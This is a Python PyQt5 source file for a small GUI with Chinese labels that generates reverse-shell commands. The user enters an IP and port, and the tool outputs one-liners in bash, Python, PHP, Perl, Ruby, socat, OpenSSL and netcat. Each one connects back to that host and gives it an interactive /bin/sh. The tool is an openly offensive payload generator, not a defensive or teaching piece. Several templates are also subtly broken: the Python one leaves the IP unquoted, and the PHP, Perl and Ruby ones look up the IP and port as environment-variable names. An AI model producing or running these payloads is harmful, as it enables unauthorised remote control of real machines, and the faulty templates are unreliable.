import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication, QMainWindow


class Ui_MainWindow(object):
    def setupUi(self, MainWindow):
        MainWindow.setObjectName("MainWindow")
        MainWindow.resize(914, 738)
        self.centralwidget = QtWidgets.QWidget(MainWindow)
        self.centralwidget.setObjectName("centralwidget")
        self.formLayoutWidget = QtWidgets.QWidget(self.centralwidget)
        self.formLayoutWidget.setGeometry(QtCore.QRect(10, 140, 621, 554))
        self.formLayoutWidget.setObjectName("formLayoutWidget")
        self.formLayout = QtWidgets.QFormLayout(self.formLayoutWidget)
        self.formLayout.setContentsMargins(0, 0, 0, 0)
        self.formLayout.setObjectName("formLayout")
        self.label = QtWidgets.QLabel(self.formLayoutWidget)
        self.label.setObjectName("label")
        self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label)
        self.bash = QtWidgets.QTextEdit(self.formLayoutWidget)
        self.bash.setObjectName("bash")
        self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.bash)
        self.label_3 = QtWidgets.QLabel(self.formLayoutWidget)
        self.label_3.setObjectName("label_3")
        self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_3)
        self.python = QtWidgets.QTextEdit(self.formLayoutWidget)
        self.python.setObjectName("python")
        self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.python)
        self.label_4 = QtWidgets.QLabel(self.formLayoutWidget)
        self.label_4.setObjectName("label_4")
        self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_4)
        self.php = QtWidgets.QTextEdit(self.formLayoutWidget)
        self.php.setObjectName("php")
        self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.php)
        self.label_5 = QtWidgets.QLabel(self.formLayoutWidget)
        self.label_5.setObjectName("label_5")
        self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_5)
        self.perl = QtWidgets.QTextEdit(self.formLayoutWidget)
        self.perl.setObjectName("perl")
        self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.perl)
        self.label_2 = QtWidgets.QLabel(self.formLayoutWidget)
        self.label_2.setObjectName("label_2")
        self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_2)
        self.ruby = QtWidgets.QTextEdit(self.formLayoutWidget)
        self.ruby.setObjectName("ruby")
        self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.ruby)
        self.label_8 = QtWidgets.QLabel(self.formLayoutWidget)
        self.label_8.setObjectName("label_8")
        self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_8)
        self.socat = QtWidgets.QTextEdit(self.formLayoutWidget)
        self.socat.setObjectName("socat")
        self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.socat)
        self.label_7 = QtWidgets.QLabel(self.formLayoutWidget)
        self.label_7.setObjectName("label_7")
        self.formLayout.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_7)
        self.openssl = QtWidgets.QTextEdit(self.formLayoutWidget)
        self.openssl.setObjectName("openssl")
        self.formLayout.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.openssl)
        self.label_6 = QtWidgets.QLabel(self.formLayoutWidget)
        self.label_6.setObjectName("label_6")
        self.formLayout.setWidget(7, QtWidgets.QFormLayout.LabelRole, self.label_6)
        self.nc = QtWidgets.QTextEdit(self.formLayoutWidget)
        self.nc.setObjectName("nc")
        self.formLayout.setWidget(7, QtWidgets.QFormLayout.FieldRole, self.nc)
        self.horizontalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
        self.horizontalLayoutWidget.setGeometry(QtCore.QRect(10, 40, 461, 101))
        self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
        self.horizontalLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)
        self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.label_9 = QtWidgets.QLabel(self.horizontalLayoutWidget)
        self.label_9.setObjectName("label_9")
        self.horizontalLayout.addWidget(self.label_9)
        self.IPEdit = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
        self.IPEdit.setObjectName("IPEdit")
        self.horizontalLayout.addWidget(self.IPEdit)
        self.label_10 = QtWidgets.QLabel(self.horizontalLayoutWidget)
        self.label_10.setObjectName("label_10")
        self.horizontalLayout.addWidget(self.label_10)
        self.PortEdit = QtWidgets.QLineEdit(self.horizontalLayoutWidget)
        self.PortEdit.setObjectName("PortEdit")
        self.horizontalLayout.addWidget(self.PortEdit)
        self.pushButton = QtWidgets.QPushButton(self.horizontalLayoutWidget)
        self.pushButton.setObjectName("pushButton")
        self.horizontalLayout.addWidget(self.pushButton)
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtWidgets.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 914, 21))
        self.menubar.setObjectName("menubar")
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtWidgets.QStatusBar(MainWindow)
        self.statusbar.setObjectName("statusbar")
        MainWindow.setStatusBar(self.statusbar)

        self.retranslateUi(MainWindow)
        self.pushButton.clicked.connect(self.gen)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)

    def retranslateUi(self, MainWindow):
        _translate = QtCore.QCoreApplication.translate
        MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
        self.label.setText(_translate("MainWindow", "bash"))
        self.label_3.setText(_translate("MainWindow", "python"))
        self.label_4.setText(_translate("MainWindow", "php"))
        self.label_5.setText(_translate("MainWindow", "perl"))
        self.label_2.setText(_translate("MainWindow", "ruby"))
        self.label_8.setText(_translate("MainWindow", "socat"))
        self.label_7.setText(_translate("MainWindow", "openssl"))
        self.label_6.setText(_translate("MainWindow", "nc"))
        self.label_9.setText(_translate("MainWindow", "IP"))
        self.label_10.setText(_translate("MainWindow", "端口"))
        self.pushButton.setText(_translate("MainWindow", "生成"))


    def gen(self):
        _translate = QtCore.QCoreApplication.translate
        ip = self.IPEdit.text()
        port = self.PortEdit.text()
        self.bash.setText(_translate("MainWindow", f"bash -c 'exec bash -i &>/dev/tcp/{ip}/{port} <&1'"))
        self.python.setText(_translate("MainWindow", f'''python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(({ip},{port}));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' '''))
        self.php.setText(_translate("MainWindow", f'''php -r '$sock=fsockopen(getenv("{ip}"),getenv("{port}"));exec("/bin/sh -i <&3 >&3 2>&3");' '''))
        self.perl.setText(_translate("MainWindow", f'''perl -e 'use Socket;$i="$ENV{{{ip}}}";$p=$ENV{{{port}}};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");}};' '''))
        self.ruby.setText(_translate("MainWindow", f'''ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["{ip}"],ENV["{port}"]);while(cmd=c.gets);IO.popen(cmd,"r"){{|io|c.print io.read}}end' '''))
        self.socat.setText(_translate("MainWindow", f"socat tcp-connect:{ip}:{port} exec:/bin/sh,pty,stderr,setsid,sigint,sane"))
        self.openssl.setText(_translate("MainWindow", f"mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {ip}:{port} > /tmp/s; rm /tmp/s"))
        self.nc.setText(_translate("MainWindow", f"nc -e /bin/sh {ip} {port}"))


if __name__ == '__main__':
    app = QApplication(sys.argv)
    MainWindow = QMainWindow()

    ui = Ui_MainWindow()
    ui.setupUi(MainWindow)

    MainWindow.show()
    sys.exit(app.exec_())